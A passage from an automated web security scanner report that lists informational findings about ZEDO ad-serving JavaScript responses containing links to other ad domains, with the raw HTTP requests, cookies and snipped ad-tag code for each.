User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFad=4:1:3:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|0,1,1:0,1,1:0,1,1:0,1,1:1,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:0,1,1:0,1,1:0,1,1:1,1,1;expires=Tue, 24 May 2011 16:46:21 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:4:1:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=240
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:21 GMT
Connection: close
Content-Length: 2073

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=929089%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=4%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=4%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.224. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.4160281161827498 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=39:37:36:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=37:39:37:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=48
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:33 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=37%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=37%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.225. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.3739131480559404 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=32:31:31:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=32:32:31:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=76
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:49:06 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=32%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=32%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.226. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.2389674969113862 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=67:57:55:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=56:67:57:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=150
Expires: Sun, 24 Apr 2011 16:53:39 GMT
Date: Sun, 24 Apr 2011 16:51:09 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=56%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=56%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.227. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.22411098228171938 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=56:67:57:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=58:56:67:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=149
Expires: Sun, 24 Apr 2011 16:53:38 GMT
Date: Sun, 24 Apr 2011 16:51:09 GMT
Connection: close
Content-Length: 2694

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=935452%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=58%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=58%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.228. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.025508692406337963 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=40:39:42:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=41:39:42:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:44 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=41%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=41%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.229. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9742649453750609 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=29:30:30:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=30:30:30:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=84
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:48:58 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=30%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=30%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.230. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.5062957211926392 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,7:809,1050,9:809,1050,21; FFgeo=2241452; FFad=49:44:45:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=45:49:45:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=113
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:01 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=45%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=45%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.231. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.26509648644882005 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=21:21:22:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:30 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=23:21:21:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=111
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:30 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<IFRAME SRC="http://ad.doubleclick.net/adi/N5767.dogtimemedia.comOX6462/B5108358.3;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=23%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=23%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5108358.3;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=23%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=23%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.232. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.19750667375441982 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=56:51:50:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=51:56:51:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=98
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:16 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
